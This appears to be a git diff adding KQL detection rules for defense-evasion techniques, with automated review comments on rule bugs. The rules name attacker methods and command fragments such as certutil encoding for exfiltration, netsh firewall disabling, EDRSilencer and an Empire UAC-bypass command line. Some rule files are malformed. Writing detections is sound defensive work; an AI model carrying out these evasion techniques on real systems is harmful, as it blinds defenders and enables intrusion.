+| where ((ProcessCommandLine contains "--headless" and ProcessCommandLine contains "dump-dom" and ProcessCommandLine contains "http") and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")) and (not(((ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\MicrosoftEdge.exe") and (FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\Edge\\Application\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\" or FolderPath startswith "C:\\Program Files\\Microsoft\\EdgeWebView\\" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge")) or (ProcessCommandLine contains "--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom" and (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" or FolderPath contains "\\Windows\\SystemApps\\Microsoft.MicrosoftEdge") and (FolderPath endswith "\\msedge.exe" or FolderPath endswith 
"\\MicrosoftEdge.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..6671829f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,12 @@
+// Title: File Encoded To Base64 Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-02-24
+// Level: medium
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
new file mode 100644
index 00000000..5b328441
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_time_attribute_change.kql b/KQL/rules/Defense Evasion/file_time_attribute_change.kql
new file mode 100644
index 00000000..82cf7ee8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_time_attribute_change.kql
@@ -0,0 +1,10 @@
+// Title: File Time Attribute Change
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detect file time attribute change to hide new or changes to existing files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.006
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-t" or ProcessCommandLine contains "-acmr" or ProcessCommandLine contains "-d" or ProcessCommandLine contains "-r") and FolderPath endswith "/touch"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
new file mode 100644
index 00000000..33c61809
--- /dev/null
+++ b/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
@@ -0,0 +1,10 @@
+// Title: File With Suspicious Extension Downloaded Via Bitsadmin
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql new file mode 100644 index 00000000..eade8ee0 --- /dev/null +++ b/KQL/rules/Defense Evasion/files_with_system_dll_name_in_unsuspected_locations.kql @@ -0,0 +1,14 @@ +// Title: Files With System DLL Name In Unsuspected Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). +It is highly recommended to perform an initial baseline before using this rule in production. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 +// False Positives: +// - Third party software might bundle specific versions of system DLLs. + +DeviceFileEvents +| where (FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\tdh.dll") and (not((FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql new file mode 100644 index 00000000..050b2c5d --- /dev/null +++ b/KQL/rules/Defense Evasion/files_with_system_process_name_in_unsuspected_locations.kql 
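Review bot: The second description line `It is highly recommended to perform an initial baseline…` is emitted without the `//` prefix, so as rendered here a bare prose line precedes `DeviceFileEvents` and the .kql will not parse; prefix it with `// ` (and fix the converter, since this recurs across the patch). The `| where` clause also matches every DeviceFileEvents action although the rule is about file creation — add `and ActionType == "FileCreated"` so deletions or modifications of an already-present `secur32.dll`/`tdh.dll` copy do not alert on their own.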
@@ -0,0 +1,15 @@
+// Title: Files With System Process Name In Unsuspected Locations
+// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-26
+// Level: medium
+// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
+It is highly recommended to perform an initial baseline before using this rule in production.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+// False Positives:
+// - System processes copied outside their default folders for testing purposes
+// - Third party software naming their software with the same names as the processes mentioned here
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath 
endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains 
"C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\wuauclt.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql new file mode 100644 index 00000000..21ae1916 --- /dev/null +++ b/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql 
@@ -0,0 +1,10 @@
+// Title: Filter Driver Unloaded Via Fltmc.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-13
+// Level: medium
+// Description: Detect filter driver unloading activity via fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not((((ProcessCommandLine endswith "unload rtp_filesystem_filter" or ProcessCommandLine endswith "unload rtp_filter") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\") and InitiatingProcessFolderPath endswith "\\endpoint-protection-installer-x64.tmp") or (ProcessCommandLine endswith "unload DFMFilter" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql
new file mode 100644
index 00000000..efa1b78c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql
@@ -0,0 +1,10 @@
+// Title: Findstr Launching .lnk File
+// Author: Trent Liffick
+// Date: 2020-05-01
+// Level: medium
+// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1202, attack.t1027.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql
new file mode 100644
index 00000000..d8be9c5c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: Firewall Disabled via Netsh.EXE
+// Author: Fatih Sirin
+// Date: 2019-11-01
+// Level: medium
+// Description: Detects netsh commands that turns off the Windows firewall
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, attack.s0108
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql
new file mode 100644
index 00000000..50e6d47e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: Firewall Rule Deleted Via Netsh.EXE
+// Author: frack113
+// Date: 2022-08-14
+// Level: medium
+// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Legitimate administration activity
+// - Software installations and removal
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"" and InitiatingProcessFolderPath endswith "\\instup.exe") or (ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql
new file mode 100644
index 00000000..2cf9e702
--- /dev/null
+++ b/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: Firewall Rule Update Via Netsh.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate administration activity
+// - Software installations and removal
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql
new file mode 100644
index 00000000..1a816e52
--- /dev/null
+++ b/KQL/rules/Defense Evasion/flush_iptables_ufw_chain.kql
@@ -0,0 +1,12 @@
+// Title: Flush Iptables Ufw Chain
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-18
+// Level: medium
+// Description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Network administrators
+
+DeviceProcessEvents
+| where (FolderPath endswith "/iptables" or FolderPath endswith "/xtables-legacy-multi" or FolderPath endswith "/iptables-legacy-multi" or FolderPath endswith "/ip6tables" or FolderPath endswith "/ip6tables-legacy-multi") and (ProcessCommandLine contains "-F" or ProcessCommandLine contains "-Z" or ProcessCommandLine contains "-X") and (ProcessCommandLine contains "ufw-logging-deny" or ProcessCommandLine contains "ufw-logging-allow" or ProcessCommandLine contains "ufw6-logging-deny" or ProcessCommandLine contains "ufw6-logging-allow")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql
new file mode 100644
index 00000000..0d178633
--- /dev/null
+++ b/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql
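Review bot: KQL `contains` is case-insensitive, so `ProcessCommandLine contains "-F"` also matches the lowercase `-f` (`--fragment`) switch and `contains "-X"` matches `-x` (`--exact`), which widens the flush/zero/delete-chain clause on Linux where iptables flags are case-sensitive. If the source rule intends an exact-case match, the case-sensitive operators are the fix: `(ProcessCommandLine contains_cs "-F" or ProcessCommandLine contains_cs "-Z" or ProcessCommandLine contains_cs "-X")`. If the Sigma source did not use the cased modifier, this is a precision caveat worth recording as a `// Note:` line in the header rather than a change, since the ufw chain-name clause still narrows the match considerably.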
@@ -0,0 +1,12 @@
+// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrators removing applications (should always be investigated)
+
+DeviceRegistryEvents
+| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql
new file mode 100644
index 00000000..53d5ba90
--- /dev/null
+++ b/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql
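Review bot: `ActionType =~ "DeleteValue"` never matches in DeviceRegistryEvents, because Defender for Endpoint reports registry value deletions as `RegistryValueDeleted`; `DeleteValue` is the Sysmon EventType string carried over from the source rule, so as written the rule is silently dead. Change the first clause to `ActionType =~ "RegistryValueDeleted"`. It is worth checking whether the conversion pipeline maps Sysmon EventType values at all, since any other registry rule that carries `DeleteValue`, `SetValue` or `CreateKey` will have the same problem.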
@@ -0,0 +1,11 @@
+// Title: Forfiles.EXE Child Process Masquerading
+// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
+// Date: 2024-01-05
+// Level: high
+// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql
new file mode 100644
index 00000000..39f9eaa4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql
@@ -0,0 +1,15 @@
+// Title: Fsutil Suspicious Invocation
+// Author: Ecco, E.M. Anhaus, oscd.community
+// Date: 2019-09-26
+// Level: high
+// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
+Might be used by ransomwares during the attack (seen by NotPetya and others).
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1485
+// False Positives:
+// - Admin activity
+// - Scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql
new file mode 100644
index 00000000..a6c7ac31
--- /dev/null
+++ b/KQL/rules/Defense Evasion/gatekeeper_bypass_via_xattr.kql
@@ -0,0 +1,12 @@
+// Title: Gatekeeper Bypass via Xattr
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects macOS Gatekeeper bypass via xattr utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-d" and ProcessCommandLine contains "com.apple.quarantine") and FolderPath endswith "/xattr"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/gpscript_execution.kql b/KQL/rules/Defense Evasion/gpscript_execution.kql
new file mode 100644
index 00000000..00f02a38
--- /dev/null
+++ b/KQL/rules/Defense Evasion/gpscript_execution.kql
@@ -0,0 +1,12 @@
+// Title: Gpscript Execution
+// Author: frack113
+// Date: 2022-05-16
+// Level: medium
+// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate uses of logon scripts distributed via group policy
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql
new file mode 100644
index 00000000..36d60cb5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql
@@ -0,0 +1,10 @@
+// Title: Greedy File Deletion Using Del
+// Author: frack113 , X__Junior (Nextron Systems)
+// Date: 2021-12-02
+// Level: medium
+// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql
new file mode 100644
index 00000000..d1537ee7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql
@@ -0,0 +1,13 @@
+// Title: HackTool - EDRSilencer Execution
+// Author: @gott_cyber
+// Date: 2024-01-02
+// Level: high
+// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql
new file mode 100644
index 00000000..905d51f1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Empire PowerShell UAC Bypass
+// Author: Ecco
+// Date: 2019-08-30
+// Level: critical
+// Description: Detects some Empire PowerShell UAC bypass methods
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
